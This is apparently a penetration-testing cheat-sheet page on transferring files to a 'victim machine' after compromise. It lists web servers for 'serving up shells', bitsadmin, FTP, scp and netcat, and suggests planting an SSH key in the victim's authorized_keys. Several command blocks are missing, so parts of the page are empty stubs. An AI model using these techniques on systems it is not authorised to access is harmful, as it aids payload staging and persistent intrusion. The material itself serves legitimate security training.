Downloading/Transfer files

Download files to the victim machine

Simple Local Web Servers

Command

Description

python -m SimpleHTTPServer 80

Run a basic http server, great for serving up shells etc

python3 -m http.server

Run a basic Python3 http server, great for serving up shells etc

ruby -rwebrick -e "WEBrick::HTTPServer.new

(:Port => 80, :DocumentRoot => Dir.pwd).start"

Run a ruby webrick basic http server

php -S 0.0.0.0:80

Run a basic PHP http server

Updog

Link: https://github.com/sc0tfree/updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

Install using pip:

pip3 install updog

Usage

updog [-d DIRECTORY] [-p PORT] [--password PASSWORD] [--ssl]

SMTP Server

Link: https://github.com/hackerscrolls/simplesmtp

Usage: go run simplesmtp.go -save -i 0.0.0.0 -p 25

Windows

curl

Since Win10 1809 there is a build in curl

wget

Wget is alias to Invoke-WebRequest in powershell

View just content:

PS iwr

alias to Invoke-WebRequest

iwr google.com/robots.txt

bitsadmin

Use bitsadmin to download via the command line on older version of windows (works from CMD.exe)

usage:

cmd.exe /c bitsadmin /transfer {JOB NAME} /download /priority normal {LINK} {DOWNLOAD LOCATION}

example:

credit: https://gist.github.com/rosswd/cad64650ca1b03bd1789a69edbeb586c

PS WebClient

Certutil

You can download the file directly:

Or you can encode the file in base64 and then use certutil to decode it.

FTP

On a linux host start a FTP:

Or use metasploit:

Write to the file the commands on the victim:

run from cmd or powershell:

ftp -s ftp.txt

SMB Server

Start smb server on Kali (or any linux) using impacket:

From the victim:

Copy files:

TFTP Server

Start TFTP on Kali:

Download files from the victim:

VBScript

Here is a good script to make a wget-clone in VB.

If it doesn't work try piping it through unix2dos before copying it.

You then execute the script like this:

NC.exe

You can download a standalone compiled version of NC (Netcat) for windows from the nmap project (https://svn.nmap.org/nmap/ncat/), or use the kali compiled version, located in:

/usr/share/windows-binaries/nc.exe

If you're able to move the ncat to the victim you can use the normal nc functions to transfer more files (or gain a shell..)

On the attacker host:

On the victim:

Linux

scp

A built in SSH utility to trasfer files. once you gained access to the victim you can add a your pulic key to .ssh/authorized_keys or use credentials if found

Using public/private key - once a public key was copied to the victim .ssh folder, you can transfer files from the attacker to the victim by running:

scp file.exe -i id_rsa user@victim:/tmp/

The file will be transferred to the /tmp folder.

If you gained crednetials remove the -i id_rsa and login with the same command as above.

wget

wget is used to download files to the victim, run a web sever on the attacker by running:

and download from the victim:

curl

Curl is used to view web server source code, we can download files by running

ftp

linux has a build in ftp utility, first created a listerner on the attacker host:

Or use metasploit:

and then connect from the victim using

nc

A lot of unix systems have a build in nc utility which can be used to transfer files, same way as in windows.

You can download a compiled version of nc to unix from:

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat

PreviousPort knockingNextRemote Desktop

Last updated

Was this helpful?